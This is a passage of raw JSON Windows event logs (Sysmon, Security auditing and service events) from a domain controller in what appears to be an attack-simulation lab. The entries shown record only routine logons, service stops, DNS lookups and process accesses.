05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3906,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":3907,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:54.980\r\nProcessGuid: {A837DB8D-0246-5F25-0000-0010A2D40500}\r\nProcessId: 4224\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:48:54.980","ProcessGuid":"{A837DB8D-0246-5F25-0000-0010A2D40500}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","EventReceivedTime":"2020-08-01 05:48:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:57","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76849,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The Downloaded Maps Manager service entered the stopped state.","param1":"Downloaded Maps Manager","param2":"stopped","EventReceivedTime":"2020-08-01 05:48:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220410,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5DC83\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x5dc83","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:49:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220411,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x5DC83\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54874\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x5dc83","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54874","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:49:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220412,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x5DC83\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x5dc83","LogonType":"3","EventReceivedTime":"2020-08-01 05:49:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76850,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The Portable Device Enumerator Service service entered the stopped state.","param1":"Portable Device Enumerator Service","param2":"stopped","EventReceivedTime":"2020-08-01 05:49:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:18","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16384,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12121,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"Successfully scheduled Software Protection service for re-start at 2020-08-08T05:38:18Z. Reason: RulesEngine.","EventReceivedTime":"2020-08-01 05:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:18","Hostname":"win-dc-881393.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":903,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12122,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has stopped.\r\n","EventReceivedTime":"2020-08-01 05:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3908,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:18.452\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-001038840500}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:18.452","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-001038840500}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3909,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:18.452\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-001038840500}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25dfa|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:18.452","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-001038840500}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25dfa|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76851,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The Software Protection service entered the stopped state.","param1":"Software Protection","param2":"stopped","EventReceivedTime":"2020-08-01 05:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220413,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x467AC\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x467ac","LogonType":"3","EventReceivedTime":"2020-08-01 05:49:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220414,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x444A8\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x444a8","LogonType":"3","EventReceivedTime":"2020-08-01 05:49:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220415,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46818\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46818","LogonType":"3","EventReceivedTime":"2020-08-01 05:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3910,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:30.457\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 